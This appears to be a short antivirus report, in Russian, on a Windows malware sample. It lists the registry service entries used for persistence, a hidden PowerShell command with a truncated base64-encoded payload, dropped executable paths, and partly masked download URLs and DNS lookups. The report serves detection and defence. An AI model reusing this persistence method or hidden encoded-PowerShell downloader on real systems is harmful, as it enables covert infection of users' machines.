Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\publishcompon] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\publishcompon] 'ImagePath' = '"%WINDIR%\SysWOW64\publishcompon.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABRAGoAcwBpAHcAdABxAG0AbgBsAGYAPQAnAFIAbQBmAGUAdQB6AHcAeABxAGYAYQBoACcAOwAkAEcAeQBsAG0AcwB0AHcAcwBnACAAPQAgACcAMQA0ADcAJwA7ACQAWgB2AGkAdgB2AG0AdABtAHkAdQBpAG0AbwA9ACcAVwBiAG0AcgB...
- %HOMEPATH%\147.exe
- %HOMEPATH%\147.exe в %WINDIR%\syswow64\publishcompon.exe
- http://bi#####donetoone.com/blogs/xth90m/
- http://ge###alpro.com/_private/a/
- http://ku###tsov.ca/thumbs/y/
- http://17#.#3.185.19/xZe4Hcjmx
- DNS ASK bi#####donetoone.com
- DNS ASK ge###alpro.com
- DNS ASK ku###tsov.ca
- '%HOMEPATH%\147.exe'
- '%WINDIR%\syswow64\publishcompon.exe'